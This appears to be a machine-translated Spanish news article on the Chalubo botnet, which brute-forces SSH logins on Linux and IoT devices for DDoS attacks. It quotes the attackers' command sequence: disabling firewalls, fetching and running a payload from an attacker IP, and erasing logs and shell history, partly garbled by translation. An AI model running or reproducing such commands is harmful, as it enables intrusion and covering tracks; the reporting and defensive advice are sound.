Chalubo Botnet compromete su servidor
Chalubo Botnet, recientemente descubierto, que compromete a los servidores SSH de Internet en sistemas basados en Linux, dispositivos IOT y los utiliza para ataques distribuidos de denegación de servicio.
El autor de malware utiliza varias técnicas de evasión y los principios de malware más comunes de Windows para evitar las herramientas de detección, y también adoptó la técnica de análisis anti para dificultar el análisis.
Los investigadores creen que la campaña Chalubo Botnet comenzó a partir de agosto de 2018 y usó 3 componentes principales que se recuperaron del dispositivo de las víctimas ejecutando el comando de un atacante.
Downloader, el bot principal, secuencia de comandos de Lua . En este caso, el bot principal solo se ejecutó en sistemas con una arquitectura de procesador x86.
Attacker encripta tanto el componente bot principal como su correspondiente script Lua utilizando el cifrado de flujo ChaCha.
También puede tomar DDoS Protection Bootcamp - Curso de capacitación gratuito para mejorar sus habilidades de protección DDoS.
Proceso de Ataque de Botnet Chalubo
Los investigadores de Sophos descubrieron inicialmente el Chalubo Botnet desde su honeypot e identificaron que el bot intentaba violar las credenciales de inicio de sesión de fuerza contra un servidor SSH.
Honeypot estaba abierto a aceptar varios ataques con una amplia gama de ataques de fuerza bruta basados en credenciales, y los investigadores han aprendido que los atacantes utilizan una combinación de root:adminpara obtener una concha.
Más tarde, los atacantes emitieron el siguiente comando una vez que accedieron al servidor en el que están utilizando un método por capas para eliminar componentes maliciosos, pero el cifrado utilizado no es el que normalmente vemos con el malware de Linux.
/etc/init.d/iptables stop
servicio de iptables para
SuSEfirewall2 parada
reSuSEfirewall2 detener
chattr -i / usr / bin / wget
chmod 755 / usr / bin / wget
yum instalar -y wget
wget -c hxxp: //117.21.191.108: 8694 / libsdes -P / usr / bin /
chmod 777 / usr / bin / libsdes
nohup / usr / bin / libsdes> / dev / null 2> & 1 &
exportar HISTFILE = / dev / null
rm -f / var / log / wtmp
historia -c
Más tarde, el descargador utiliza una de las funciones de Mirai Botnet y crea un archivo vacío para evitar que se produzcan múltiples instancias del malware que se ejecutan en el proceso de cifrado y descarta el bot principal.
Después de analizar el bot principal, los investigadores identificaron que Chalubo había copiado algunos fragmentos de código de Mirai.
Según Sophos, "el script Lua del bot se comunica con el servidor C2 para recibir más instrucciones. Su propósito es descargar, descifrar y luego ejecutar cualquier script Lua que encuentre.
La Lua recuperada por los bots que probamos activa al bot para realizar un ataque de inundación SYN contra una sola dirección IP china a través del puerto 10100, sin enmascarar la IP de origen local. Es interesante que verifique la dirección / 24 de la IP local contra 23.247.2.0, y si está en ese rango, establecerá la IP de origen en una dentro del rango 183.131.206.0/24 ".
Este Bot utiliza principalmente las combinaciones comunes de nombre de usuario y contraseña en servidores SSH.
Una organización siempre debe garantizar y centrarse en el nivel máximo de protección para redes empresariales y puede probar una prueba gratuita para detener el ataque DDoS en 10 segundos . Además, verifique el costo del tiempo de inactividad del ataque DDOS de su compañía .
“Recomiende que los administradores de sistemas de SSH (incluidos los dispositivos integrados) cambien las contraseñas predeterminadas en esos dispositivos, ya que la fuerza bruta intenta pasar por las contraseñas predeterminadas comunes que se conocen públicamente. ”
Si es posible, es preferible usar claves SSH en lugar de contraseñas para los inicios de sesión. Al igual que con cualquier máquina, asegúrese de mantener el sistema actualizado.